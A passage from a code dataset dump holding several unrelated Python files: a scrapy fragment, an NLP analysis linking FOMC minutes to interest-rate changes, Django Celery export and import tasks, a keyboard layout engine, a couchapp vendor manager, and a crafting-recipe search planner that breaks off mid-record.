print('---------------------->>>>>>>>>>>>>>>>>>>>>>>>>', self.index)\n self.index = self.index + 1\n\n # if (self.index < (len(self.urls))):\n # url = self.urls[self.index].replace('\\n', '')\n # yield scrapy.Request(url=url, callback=self.parse, dont_filter=True)\n # self.index = self.index + 1\n # pass\n\n\nif __name__ == '__main__':\n try:\n 1 / 0\n except Exception as e:\n print('\\033[1;35;0m', e, '\\033[0m')\n f = open(\"/Users/xxm/develop/py_workspace/scrapy_learn/scrapy_learn/spiders/files/fail_url\", 'a')\n f.write('------------' + '\\n')\n f.close()\n print(111)\n","sub_path":"scrapy_learn/spiders/detail_f.py","file_name":"detail_f.py","file_ext":"py","file_size_in_byte":12100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"466816133","text":"##single minutes interval, LSA for bow\r\nimport os\r\nfrom dfply import *\r\nimport pandas as pd\r\nimport re\r\nfrom sklearn import preprocessing\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom nltk.tokenize import word_tokenize\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom multiprocessing import Pool\r\nimport warnings\r\nfrom nltk.stem import WordNetLemmatizer\r\nwarnings.filterwarnings(\"ignore\",category=DeprecationWarning)\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\nimport statsmodels.api as sm\r\nminutes = pd.read_csv(r'C:\\Users\\Comete\\Desktop\\MFinRelated\\nlp\\NLPTA_project-master\\NLPTA_project-master\\docs.csv')\r\n\r\nfrom collections import Counter\r\n\r\n\r\ndef word_prob(word): \r\n return dictionary[word]/total\r\n\t\r\n\t\r\ndef words(text): \r\n return re.findall('[a-z]+', text.lower()) \r\n\t\r\ndef viterbi_segment(text):\r\n probs, lasts = [1.0], [0]\r\n for i in range(1, len(text) + 1):\r\n prob_k, k = max((probs[j] * word_prob(text[j:i]), j)\r\n for j in range(max(0, i - max_word_length), i))\r\n probs.append(prob_k)\r\n lasts.append(k)\r\n words = []\r\n i = len(text)\r\n while 0 < i:\r\n words.append(text[lasts[i]:i])\r\n i = lasts[i]\r\n words.reverse()\r\n return words, probs[-1]\r\n\r\ndictionary = Counter(words(open(r'C:\\Users\\Comete\\big.txt').read()))\r\nmax_word_length = max(map(len, dictionary))\r\ntotal = float(sum(dictionary.values()))\r\n\r\n\r\n# 1. 
data processing\r\nminutes.pop(minutes.columns[0])\r\nfrom nltk.corpus import stopwords\r\nimport spacy\r\nnlp = spacy.load('en_core_web_sm',disable=['parser', 'ner'])\r\n\r\nstop_words = stopwords.words('english')\r\n\r\nimport datetime\r\nMonth = [datetime.date(2008, i, 1).strftime('%B').lower() for i in range(1,13)]\r\nstop_words.extend(['year','month','day','mr','meeting','committee','ms','federal','page']\r\n                  + Month)\r\n\r\nimport gensim\r\ndef sent_to_words(sentences):\r\n    for sentence in sentences:\r\n        yield(gensim.utils.simple_preprocess(str(sentence), deacc=True))  # deacc=True removes punctuations\r\n\r\ntexts = list(sent_to_words(minutes['content']))\r\n\r\nbigram = gensim.models.Phrases(texts, min_count=5, threshold=100)  # higher threshold fewer phrases.\r\nbigram_mod = gensim.models.phrases.Phraser(bigram)\r\n\r\nfrom gensim.utils import simple_preprocess\r\ndef remove_stopwords(texts):\r\n    return [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts]\r\n\r\ndef make_bigrams(texts):\r\n    return [bigram_mod[doc] for doc in texts]\r\n\r\ndef lemmatization(data, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']):\r\n    texts_out = []\r\n    for sent in data:\r\n        doc = nlp(re.sub('\\_','',\" \".join(sent)))\r\n        tokens = [token.lemma_ for token in doc if token.pos_ in allowed_postags]\r\n        new_tokens = []\r\n        for i in tokens:\r\n            for j in viterbi_segment(i)[0]:\r\n                new_tokens.append(j)\r\n        texts_out.append(new_tokens)\r\n    return texts_out\r\n\r\ncorpus_no_stops = remove_stopwords(texts)\r\ncorpus_bigrams = make_bigrams(corpus_no_stops)\r\nset(['infla_tion' in word for word in corpus_bigrams])\r\ndata_lemmatized = lemmatization(corpus_bigrams, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV'])\r\n\r\ncorpus = [' '.join(wordList) for wordList in data_lemmatized]\r\nset(['infla_tion' in word for word in corpus])\r\n\r\n# bag of words with sklearn\r\nvectorizer = CountVectorizer(stop_words = 'english',lowercase = True)\r\nAnnualBow = vectorizer.fit_transform(corpus)\r\ndf_AnnualBow = pd.DataFrame(AnnualBow.A,columns = vectorizer.get_feature_names())\r\nfor term in ['year','month','day']:\r\n    try:\r\n        df_AnnualBow.pop(term)\r\n    except:\r\n        continue\r\n\r\n'month' in df_AnnualBow.columns\r\n\r\ndf_AnnualBow.astype(bool).sum(axis=1)\r\nfrequency = df_AnnualBow.astype(bool).sum(axis=0)\r\nless = frequency[frequency<3]\r\ndf_AnnualBow=df_AnnualBow.drop(less.index,axis=1)\r\n\r\n## remove those meaningless words\r\n\r\nbowScaled = preprocessing.scale(df_AnnualBow)\r\ndf_bowScaled = pd.DataFrame(bowScaled,columns=df_AnnualBow.columns)\r\nminutes_BoW_sk2 = pd.concat([minutes,df_bowScaled],axis = 1)\r\n\r\n# tf-idf sklearn\r\nv = TfidfVectorizer(stop_words='english', max_df=0.9)\r\ntfidf = v.fit_transform(corpus)\r\ndf_Annualtfidf = pd.DataFrame(tfidf.A,columns = v.get_feature_names())\r\n\r\nfor term in ['year','month','day']:\r\n    try:\r\n        df_Annualtfidf.pop(term)\r\n    except:\r\n        continue\r\n\r\ndf_Annualtfidf.astype(bool).sum(axis=1)\r\nfrequency2 = df_Annualtfidf.astype(bool).sum(axis=0)\r\nless2 = frequency2[frequency2<3]\r\ndf_Annualtfidf=df_Annualtfidf.drop(less2.index,axis=1)\r\n\r\ntfidfScaled = preprocessing.scale(df_Annualtfidf)\r\ndf_tfidfScaled = pd.DataFrame(tfidfScaled,columns=df_Annualtfidf.columns)\r\nminutes_tfidf_sk = pd.concat([minutes,df_tfidfScaled],axis = 1)\r\n\r\n# import interest rate data and merge them\r\nIR = 
pd.read_csv(r'C:\Users\Comete\Desktop\MFinRelated\nlp\NLPTA_project-master\NLPTA_project-master\fed-funds-rate-historical-chart.csv')\r\nIR >> head(3)\r\n\r\nminutes_BoW_sk2['oldDate'] = pd.to_datetime(minutes_BoW_sk2['file_name'],format='%Y%m%d',errors='ignore')\r\nminutes_tfidf_sk['oldDate'] = pd.to_datetime(minutes_tfidf_sk['file_name'],format='%Y%m%d',errors='ignore')\r\nIR['Date'] = pd.to_datetime(IR['date'],format='%Y/%m/%d',errors='ignore')\r\n\r\nminutes_BoW_sk2['Date'] = minutes_BoW_sk2['oldDate'] + datetime.timedelta(days=23)\r\nminutes_tfidf_sk['Date'] = minutes_tfidf_sk['oldDate'] + datetime.timedelta(days=23)\r\n\r\nbow_IR = pd.merge(IR,minutes_BoW_sk2,on = 'Date',how = 'left')\r\n\r\ntfIdf_IR = pd.merge(IR,minutes_tfidf_sk,on = 'Date',how = 'left')\r\n\r\nbow_IR_diff = bow_IR.dropna()\r\nbow_IR_diff['rateChange'] = bow_IR_diff['fedRate'].shift(-1) - bow_IR_diff['fedRate']\r\ntfIdf_IR_diff = tfIdf_IR.dropna()\r\ntfIdf_IR_diff['rateChange'] = tfIdf_IR_diff['fedRate'].shift(-1) - tfIdf_IR_diff['fedRate']\r\n\r\nimport numpy as np\r\ndef CorTerms(terms,df_sum,y,top = None,bottom = None):\r\n    correlations = [np.corrcoef(y,df_sum[term])[0,1]\r\n                    for term in list(terms)]  ## change the index\r\n    IR_corTerms = pd.DataFrame({'keyterms':terms,'correlations':correlations})\r\n    top = IR_corTerms.sort_values(by = 'correlations',ascending = False) >> head(top)\r\n    bottom = IR_corTerms.sort_values(by = 'correlations',ascending = True) >> head(bottom)\r\n    return IR_corTerms,top,bottom\r\n\r\ndef corBar(x,y):\r\n    plt.barh(range(len(x)), y, height=0.7, color='steelblue', alpha=0.8) \r\n    plt.yticks(range(len(x)), x)\r\n    plt.xlabel(\"correlations\")\r\n    plt.ylabel('keyterms')\r\n    plt.title(\" correlations with IR change\")\r\n    plt.show()\r\n\r\nbow_IR_diff = bow_IR_diff.dropna()\r\nbow_IR_diff=bow_IR_diff.drop(['date_x','year','month','day','file_name','oldDate','content'],axis=1)\r\nbow_IR_diff.sort_values(by=['Date','rateChange'],ascending = True)\r\nCorBowIR = CorTerms(bow_IR_diff.columns[2:-1],bow_IR_diff,bow_IR_diff['rateChange'],top = 20,bottom = 20)\r\nbow_top = CorBowIR[1]\r\nbow_bottom = CorBowIR[2]\r\ncorBar(bow_top['keyterms'],bow_top['correlations'])\r\ncorBar(bow_bottom['keyterms'],bow_bottom['correlations'])\r\n\r\ntfIdf_IR_diff = tfIdf_IR_diff.dropna()\r\ntfIdf_IR_diff=tfIdf_IR_diff.drop(['date_x','year','month','day','file_name','oldDate','content'],axis=1)\r\ntfIdf_IR_diff.sort_values(by=['Date','rateChange'],ascending = True)\r\nCorTfidfIR = CorTerms(tfIdf_IR_diff.columns[2:-1],tfIdf_IR_diff,tfIdf_IR_diff['rateChange'],top = 20,bottom = 20)\r\ntfIdf_top = CorTfidfIR[1]\r\ntfIdf_bottom = CorTfidfIR[2]\r\ncorBar(tfIdf_top['keyterms'],tfIdf_top['correlations'])\r\ncorBar(tfIdf_bottom['keyterms'],tfIdf_bottom['correlations'])\r\n\r\n\r\n#LSA\r\nfrom sklearn.decomposition import TruncatedSVD\r\nimport sklearn\r\nfrom sklearn.preprocessing import Normalizer\r\nfrom sklearn import metrics\r\nfrom sklearn.cluster import KMeans, MiniBatchKMeans\r\nlsa = TruncatedSVD(400,algorithm='arpack')\r\ndf_bow_lsa = lsa.fit_transform(df_bowScaled)\r\ndf_bow_lsa = Normalizer(copy=False).fit_transform(df_bow_lsa)\r\ndf_bow_lsa = pd.DataFrame(df_bow_lsa, columns = [\"component%d\" % i for i in range(1,401)])\r\nminutes_bow_lsa = pd.concat([minutes,df_bow_lsa],axis = 1)\r\nminutes_bow_lsa['oldDate'] = pd.to_datetime(minutes_bow_lsa['file_name'],format='%Y%m%d',errors='ignore')\r\n\r\nminutes_bow_lsa['Date'] = minutes_bow_lsa['oldDate'] + datetime.timedelta(days=23)\r\nbow_IR_lsa = 
pd.merge(IR,minutes_bow_lsa,on = 'Date',how = 'left')\r\nbow_IR_diff_lsa = bow_IR_lsa.dropna()\r\nbow_IR_diff_lsa['rateChange'] = bow_IR_diff_lsa['fedRate'].shift(-1) - bow_IR_diff_lsa['fedRate']\r\nbow_IR_diff_lsa = bow_IR_diff_lsa.dropna()\r\nbow_IR_diff_lsa=bow_IR_diff_lsa.drop(['year','month','day','file_name','oldDate','content'],axis=1)\r\nCorbowIR_lsa = CorTerms(bow_IR_diff_lsa.columns[3:-1],bow_IR_diff_lsa,bow_IR_diff_lsa['rateChange'],top = 20,bottom = 20)\r\nbow_top_lsa = CorbowIR_lsa[1]\r\nbow_bottom_lsa = CorbowIR_lsa[2]\r\ncorBar(bow_top_lsa['keyterms'],bow_top_lsa['correlations'])\r\ncorBar(bow_bottom_lsa['keyterms'],bow_bottom_lsa['correlations'])\r\nsimilarity = np.asarray(np.asmatrix(df_bow_lsa) * np.asmatrix(df_bow_lsa).T)\r\nsimilarity = pd.DataFrame(similarity,index=minutes_bow_lsa['Date'], columns=minutes_bow_lsa['Date'])\r\n\r\n\r\n# logistic regression\r\n\r\nIR_ChID = np.where(bow_IR_diff_lsa['rateChange']>0,1,0)\r\nbow_IR_diff_lsa.insert(1,'IR_ChID',IR_ChID)\r\nbow_IR_diff_lsa\r\n## to improve the model, I would filter out those insignificant terms\r\nfrom sklearn.feature_selection import f_regression\r\nwords = bow_IR_diff_lsa.columns[4:-1]\r\nX = bow_IR_diff_lsa[words] \r\ny = bow_IR_diff_lsa['IR_ChID']\r\nlogisreg = f_regression(X, y, center=True)\r\nFvalue = logisreg[0]\r\nPvalue = logisreg[1]\r\n\r\nstat_CorbowIR = CorbowIR_lsa[0]\r\nstat_CorbowIR['Fvalue'] = Fvalue\r\nstat_CorbowIR['Pvalue'] = Pvalue\r\n\r\nsignTerms = stat_CorbowIR.query('Pvalue < 0.05')\r\n\r\nsignTerms['Cor_P'] = signTerms['correlations'] /signTerms['Pvalue']*signTerms['Fvalue']\r\nsignTermsBottom = signTerms.sort_values(by='correlations', ascending=True) >> head(20)\r\nsignTermsTop = signTerms.sort_values(by = 'correlations', ascending=False) >> head(20)\r\n\r\ncorBar(signTermsTop['keyterms'],signTermsTop['correlations'])\r\ncorBar(signTermsBottom['keyterms'],signTermsBottom['correlations'])\r\n\r\nID_var = signTerms['keyterms'].tolist()\r\nX = bow_IR_diff_lsa[ID_var]\r\ny = IR_ChID\r\n\r\n\r\n#machine learning for prediction\r\n\r\nfrom sklearn.model_selection import train_test_split,GridSearchCV\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import tree\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.gaussian_process.kernels import RBF\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.linear_model import LogisticRegression\r\nimport time\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn import svm\r\nfrom sklearn import metrics\r\nfrom sklearn import linear_model\r\nfrom sklearn import preprocessing\r\nfrom sklearn import utils\r\n\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\r\n\r\nlab_enc = preprocessing.LabelEncoder()\r\ny_train_encoded = lab_enc.fit_transform(y_train)\r\n\r\nclassifiers = {\r\n    'SVR':svm.SVR(),\r\n    'SVC':SVC(),\r\n    'SGD':linear_model.SGDRegressor(),\r\n    'BAYES':linear_model.BayesianRidge(),\r\n    'LL':linear_model.LassoLars(),\r\n    'ARD':linear_model.ARDRegression(),\r\n    'PA':linear_model.PassiveAggressiveRegressor(),\r\n    'TS':linear_model.TheilSenRegressor(),\r\n    'L':linear_model.LinearRegression()\r\n    }\r\n\r\ntrain_scores = []\r\n\r\ntest_scores = []\r\nnames = []\r\nmodels 
= {}\r\nfor key in classifiers.keys(): \r\n clf = classifiers[key]\r\n clf.fit(X_train, y_train)\r\n train_score = clf.score(X_train, y_train)\r\n test_score = clf.score(X_test, y_test)\r\n y_test_predict = clf.predict(X_test)\r\n train_scores.append(train_score)\r\n test_scores.append(test_score)\r\n names.append(key)\r\n\r\nmodels['train_score'] = train_scores\r\n\r\nmodels['test_score'] = test_scores\r\nmodels['model'] = names\r\ndf_models = pd.DataFrame(models)\r\ndf_models.to_csv('models.csv')\r\n\r\n\r\nmodel_names = []\r\nbest_scores = []\r\nbest_models = []\r\n\r\nfor key in classifiers.keys(): \r\n try:\r\n clf = classifiers[key]\r\n parameters = {'kernel':('linear', 'rbf'), 'C':(0.1, 1,5, 10)}\r\n gs = GridSearchCV(clf, parameters)\r\n gs.fit(X_train, y_train)\r\n best_scores.append(gs.best_score_)\r\n best_models.append(gs.best_params_)\r\n model_names.append(key)\r\n except:\r\n continue\r\n\r\nbest = {}\r\nbest['name'] = model_names\r\nbest['score'] = best_scores\r\nbest['param'] = best_models\r\ndf_best = pd.DataFrame(best)\r\ndf_best.to_csv('best.csv')\r\n\r\nparameters = {'kernel':('linear', 'rbf'), 'C':(0.1,0.5,0.8, 1,1.2,1.5,2,5, 10)}\r\ngs = GridSearchCV(SVC(), parameters)\r\ngs.fit(X_train, y_train)\r\ndf_gs=pd.DataFrame(gs.cv_results_)\r\ndf_gs.to_csv('best2.csv')\r\ngs.score(X_test,y_test)\r\n\t","sub_path":"code of 4D-Intelli/FOMC_analysis_single minutes interval, LSA for bow.py","file_name":"FOMC_analysis_single minutes interval, LSA for bow.py","file_ext":"py","file_size_in_byte":13012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160274119","text":"from smtplib import SMTPException\r\n\r\nimport pandas as pd\r\nfrom celery import shared_task\r\nfrom django.conf import settings\r\nfrom django.core.cache import cache\r\nfrom django.core.files.storage import default_storage\r\nfrom django.core.mail import EmailMessage\r\nfrom django.utils import timezone\r\n\r\nfrom course_flow import export_functions, import_functions\r\nfrom course_flow import redux_actions as actions\r\n\r\nfrom .celery import logger, try_async\r\nfrom .models import ObjectSet, User\r\nfrom .utils import dateTimeFormatNoSpace, get_model_from_str\r\n\r\n\r\n@try_async\r\n@shared_task\r\ndef async_send_export_email(\r\n user_email,\r\n pk,\r\n object_type,\r\n export_type,\r\n export_format,\r\n allowed_sets,\r\n email_subject,\r\n email_text,\r\n):\r\n model_object = get_model_from_str(object_type).objects.get(pk=pk)\r\n if object_type == \"project\":\r\n project_sets = ObjectSet.objects.filter(project=model_object)\r\n else:\r\n project_sets = ObjectSet.objects.filter(\r\n project=model_object.get_project()\r\n )\r\n allowed_sets = project_sets.filter(id__in=allowed_sets)\r\n if export_type == \"outcome\":\r\n file = export_functions.get_outcomes_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n elif export_type == \"framework\":\r\n file = export_functions.get_course_frameworks_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n elif export_type == \"matrix\":\r\n file = export_functions.get_program_matrix_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n elif export_type == \"node\":\r\n file = export_functions.get_nodes_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n if export_format == \"excel\":\r\n file_ext = \"xlsx\"\r\n elif export_format == \"csv\":\r\n file_ext = \"csv\"\r\n\r\n filename = (\r\n object_type\r\n + \"_\"\r\n 
+ str(pk)\r\n        + \"_\"\r\n        + export_type\r\n        + \"_\"\r\n        + timezone.now().strftime(dateTimeFormatNoSpace())\r\n        + \".\"\r\n        + file_ext\r\n    )\r\n    email = EmailMessage(\r\n        email_subject,\r\n        email_text,\r\n        settings.DEFAULT_FROM_EMAIL,\r\n        [user_email],\r\n    )\r\n    if export_format == \"csv\":\r\n        file_data = \"text/csv\"\r\n    elif export_format == \"excel\":\r\n        file_data = (\r\n            \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\r\n        )\r\n    if settings.DEBUG:\r\n        with open(\"last_export.\" + file_ext, \"wb\") as out_file:\r\n            out_file.write(file)\r\n\r\n    email.attach(\r\n        filename,\r\n        file,\r\n        file_data,\r\n    )\r\n    try:\r\n        email.send()\r\n        logger.info(\r\n            f\"Email - {email_subject} - {filename} - sent to {user_email}\"\r\n        )\r\n    except SMTPException:\r\n        logger.info(\r\n            f\"Email - {email_subject} - {filename} - could NOT be sent to {user_email}\"\r\n        )\r\n\r\n\r\n@try_async\r\n@shared_task\r\ndef async_import_file_data(pk, object_type, task_type, file_json, user_id):\r\n    model_object = get_model_from_str(object_type).objects.get(pk=pk)\r\n    user = User.objects.get(pk=user_id)\r\n    if object_type == \"workflow\":\r\n        actions.dispatch_wf(\r\n            model_object,\r\n            actions.changeField(pk, \"workflow\", {\"importing\": True}, False),\r\n        )\r\n    cache.set(object_type + str(pk) + \"importing\", True, 300)\r\n    df = pd.read_json(file_json)\r\n    try:\r\n        if task_type == \"outcomes\":\r\n            import_functions.import_outcomes(df, model_object, user)\r\n        if task_type == \"nodes\":\r\n            import_functions.import_nodes(df, model_object, user)\r\n    except Exception:\r\n        pass\r\n    cache.delete(object_type + str(pk) + \"importing\")\r\n    if object_type == \"workflow\":\r\n        actions.dispatch_wf(\r\n            model_object,\r\n            actions.changeField(pk, \"workflow\", {\"importing\": False}, False),\r\n        )\r\n","sub_path":"course_flow/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"278645599","text":"import json\n\nclass KeyboardLayoutEngine:\n    def __init__(self):\n        self.layout=[]\n        self.properties={}\n        self.pitch=19.05\n\n    def load_layout_from_file(self, filename):\n        with open(filename) as fp:\n            self.raw_data=json.load(fp)\n\n        # Weed out the key layout data from the other properties\n        for line in self.raw_data:\n            if isinstance(line, dict):\n                self.properties.update(line)\n            else:\n                self.layout.append(line)\n    \n    def layout_switches(self):\n        centre_y=0.0\n        switches=[]\n        xmin=xmax=ymin=ymax=0.0\n        for row, row_data in enumerate(self.layout):\n            centre_x=0.0\n            next_height = next_width = 1.0\n            next_x_offset = next_y_offset = 0.0\n            col=0\n            for col, key in enumerate(row_data):\n                width=next_width\n                height=next_height\n                if col==0 and row>0:\n                    centre_y+=1.0\n                if isinstance(key, dict):\n                    if 'x' in key:\n                        centre_x+=key['x']\n                    if 'y' in key:\n                        centre_y+=key['y']\n                    if 'w' in key:\n                        next_width=key['w']\n                    if 'h' in key:\n                        next_height=key['h']\n                    if 'x2' in key:\n                        next_x_offset=key['x2']\n                    if 'y2' in key:\n                        next_y_offset=key['y2']\n                else:\n                    x=(centre_x + (width-1)/2 + next_x_offset)*self.pitch\n                    y=(centre_y + (height-1)/2 + next_y_offset)*self.pitch\n                    sw={'label': key, 'x': x, 'y': y, 'row': row, 'col': col, 'rot': 0.0}\n                    switches.append(sw)\n                    centre_x+=width\n                    next_width=1.0\n                    next_height=1.0\n                    next_x_offset=0.0\n                    next_y_offset=0.0\n                    # x and y are already in millimetres, so divide the pitch back out\n                    # to track the bounding box in key units before scaling once on return\n                    xmin=min(xmin, x/self.pitch-width/2)\n                    ymin=min(ymin, y/self.pitch-height/2)\n                    xmax=max(xmax, x/self.pitch+width/2)\n                    ymax=max(ymax, y/self.pitch+height/2)\n        return switches, (xmin*self.pitch, xmax*self.pitch, ymin*self.pitch, 
ymax*self.pitch)\n","sub_path":"keyboard/layoutengine.py","file_name":"layoutengine.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"81301050","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2009 Benoit Chesneau \n#\n# This software is licensed as described in the file LICENSE, which\n# you should have received as part of this distribution.\n#\n\nimport os\nimport sys\n\nfrom couchapp.errors import VendorError\nfrom couchapp.utils import *\n\n__all__ = ['VENDOR_HANDLERS', 'Vendor']\n\nCOUCHAPP_VENDOR_URL = 'git://github.com/couchapp/couchapp.git'\nCOUCHAPP_VENDOR_SCM = 'git'\n\nclass Vendor(object):\n \"\"\" Vendor object to manage vendors in a couchapp \"\"\"\n \n def __init__(self, app_dir, ui):\n \"\"\" Constructor of vendor object \n \n :attr app_dir: string, path of app_dir\n \"\"\"\n vendor_dir = os.path.join(app_dir, \"vendor\")\n if not os.path.isdir(vendor_dir):\n os.makedirs(vendor_dir)\n self.vendor_dir = vendor_dir\n self.ui = ui\n self._vendor_handlers = None\n \n def global_vendor_handlers(self):\n return {\n 'git': 'couchapp.vendor_handlers.git'\n }\n \n def vendor_handlers(self):\n if self._vendor_handlers is None:\n self._vendor_handlers = {}\n handlers = self.global_vendor_handlers()\n if \"vendor_handlers\" in self.ui.conf:\n try:\n handlers.update(self.ui.conf['vendor_handlers'])\n except ValueError:\n pass\n \n for handler_name, mod_name in handlers.items():\n mod = __import__(mod_name, {}, {}, [''])\n if not hasattr(mod, 'cmdtable'):\n continue\n cmdtable = getattr(mod, 'cmdtable')\n self._vendor_handlers[handler_name] = cmdtable\n\n return self._vendor_handlers\n \n def get_vendors(self):\n \"\"\" get list of vendors\n \n :return: list, vendor names\n \"\"\"\n \n vendors = []\n for name in self.ui.listdir(self.vendor_dir):\n current_path = self.ui.rjoin(self.vendor_dir, name)\n if self.ui.isdir(current_path):\n vendors.append(name)\n return vendors\n \n def install(self, url, scm=\"git\"):\n \"\"\" install a vendor in the couchapp dir.\n \n :attr url: string, url to retrieve vendor\n :attr scm: string, name of scm used to retrieve vendor. Default scm\n is git. You could add scm in ~/.couchapprc like this in `vendor_handlers`\n property :\n \n .. code-block:: javascript\n {\n \"vendor_handlers\": {\n \"scm\": \"module\"\n }\n }\n \n a vendor module receive 2 actions `install` and `update` and take differents arguments:\n * install :\n \n def install(ui, url, vendor_dir):\n ....\n\n * update :\n \n def update(ui, url, path, vendor_dir):\n ....\n \n Errors should be returned to stderr. 
When installing the script should create a file named\n `.new` with url used to retrieve the vendor as first line.\n \n :attr verbose: boolean, False by default\n \n \"\"\"\n if not scm in self.vendor_handlers():\n raise VendorError(\"%s scm isn't supported yet.\" % scm)\n \n # get list of installed vendors\n installed = self.get_vendors()\n \n handler = self.vendor_handlers()[scm]\n handler['install'](self.ui, url, self.vendor_dir)\n \n # detect new vendor application and add url so we could update later\n for name in self.ui.listdir(self.vendor_dir):\n current_path = self.ui.rjoin(self.vendor_dir, name)\n if self.ui.isdir(current_path) and name not in installed:\n new_file = self.ui.rjoin(current_path, '.new')\n if self.ui.isfile(new_file):\n new_url = self.ui.read(new_file).strip()\n if new_url == url:\n mfile = self.ui.rjoin(current_path, 'metadata.json')\n self.ui.write_json(mfile, {\n \"scm\": scm,\n \"update_url\": url\n })\n self.ui.unlink(new_file)\n return\n \n def _update(self, name):\n current_path = self.ui.rjoin(self.vendor_dir, name)\n if self.ui.isdir(current_path):\n mfile = self.ui.rjoin(current_path, 'metadata.json')\n metadata = self.ui.read_json(mfile)\n if not metadata and name == 'couchapp':\n update_url = COUCHAPP_VENDOR_URL\n scm = COUCHAPP_VENDOR_SCM\n elif metadata:\n update_url = metadata['update_url']\n scm = metadata['scm']\n if not scm in self.vendor_handlers():\n scm = False\n \n if update_url and scm:\n # for now we manage only internal handlers\n handler = self.vendor_handlers()[scm]\n if self.ui.verbose >= 1:\n self.ui.logger.info(\"Updating %s from %s\" % (\n current_path, update_url)) \n handler['update'](self.ui, update_url, current_path, self.vendor_dir) \n \n def update(self, name=None): \n \"\"\"\n update vendor or all vendors if name is None\n \n :attr name: string, name of vendor\n :attr verbose: boolean, False by default\n \"\"\"\n multiple = isinstance(name, (list, tuple,))\n for vendor_name in self.ui.listdir(self.vendor_dir):\n if (multiple and vendor_name in name) or name is None:\n self._update(vendor_name)\n elif name and vendor_name == name:\n self._update(vendor_name)\n break","sub_path":"src/couchapp/vendor.py","file_name":"vendor.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280062436","text":"from collections import namedtuple\nfrom heapq import heappop, heappush\nimport json\n\ndef make_checker(rule, items):\n consumes = ()\n requirements = ()\n\n if rule.get(\"Consumes\") != None:\n consumes = itemsToTuple(rule[\"Consumes\"], items)\n\n if rule.get(\"Requires\") != None:\n requirements = itemsToTuple(rule[\"Requires\"], items)\n\n def check(state):\n if contains(state, requirements) == False:\n return False\n\n if contains(state, consumes) == False:\n return False\n\n return True\n\n return check\n\ndef make_effector(rule, items):\n consumes = ()\n produces = ()\n\n if rule.get(\"Consumes\") != None:\n consumes = itemsToTuple(rule[\"Consumes\"], items)\n\n if rule.get(\"Produces\") != None:\n produces = itemsToTuple(rule[\"Produces\"], items)\n\n def effect(state):\n nextState = state;\n\n if consumes != () and nextState != ():\n nextState = combineTuple(nextState, consumes, \"sub\")\n\n if produces != () and nextState != ():\n nextState = combineTuple(nextState, produces, \"add\")\n\n return nextState\n\n return effect\n\ndef heuristic(node, nextNode, bases):\n cost = 0\n\n if nextNode != () and bases != ():\n for i, amount in 
    cost = 0\n\n    if nextNode != () and bases != ():\n        for i, amount in enumerate(bases):\n            if nextNode[i] >= amount:\n                cost += 1000\n\n    for i in range(len(node)):\n        if node[i] >= nextNode[i] and node[i] != 0 and nextNode[i] != 0:\n            cost -= 1\n\n    # bench\n    if nextNode[0] > 1:\n        cost += float(\"inf\")\n\n    # furnace\n    if nextNode[4] > 1:\n        cost += float(\"inf\")\n\n    # iron_axe\n    if nextNode[6] > 1:\n        cost += float(\"inf\")\n\n    # iron_pickaxe\n    if nextNode[7] > 1:\n        cost += float(\"inf\")\n\n    # stone_axe\n    if nextNode[12] > 1:\n        cost += float(\"inf\")\n\n    # stone_pickaxe\n    if nextNode[13] > 1:\n        cost += float(\"inf\")\n\n    # wooden_axe\n    if nextNode[15] > 1:\n        cost += float(\"inf\")\n\n    # wooden_pickaxe\n    if nextNode[16] > 1:\n        cost += float(\"inf\")\n\n    # coal\n    if nextNode[2] > 1:\n        cost += float(\"inf\")\n\n    # cobble\n    if nextNode[3] > 8:\n        cost += float(\"inf\")\n\n    # ingot\n    if nextNode[5] > 6:\n        cost += float(\"inf\")\n\n    # ore\n    if nextNode[8] > 1:\n        cost += float(\"inf\")\n\n    # plank\n    if nextNode[9] > 4:\n        cost += 1\n\n    # stick\n    if nextNode[11] > 8:\n        cost += float(\"inf\")\n\n    # wood\n    if nextNode[14] > 1:\n        cost += float(\"inf\")\n\n    return cost\n\ndef graph(state, recipes):\n    adjacent = []\n\n    for recipe in recipes:\n        if recipe.check(state):\n            adjacent.append((recipe.cost, recipe.effect(state), recipe.name))\n\n    return adjacent\n\n\ndef plan(graph, state, items, goals, recipes, bases):\n    dist = {}\n    prev = {}\n    name = {}\n    initial = itemsToTuple(state, items)\n    goal = itemsToTuple(goals, items)\n    dist[initial] = 0\n    prev[initial] = None\n    name[initial] = \"initial\"\n    heap = [(dist[initial], initial, name[initial])]\n\n    while heap:\n        node = heappop(heap)\n\n        if contains(node[1], goal):\n            break\n\n        for nextNode in graph(node[1], recipes):\n            distance = nextNode[0] + dist[node[1]]\n\n            if nextNode[1] not in dist or distance < dist[nextNode[1]]:\n                dist[nextNode[1]] = distance\n                prev[nextNode[1]] = node[1]\n                name[nextNode[1]] 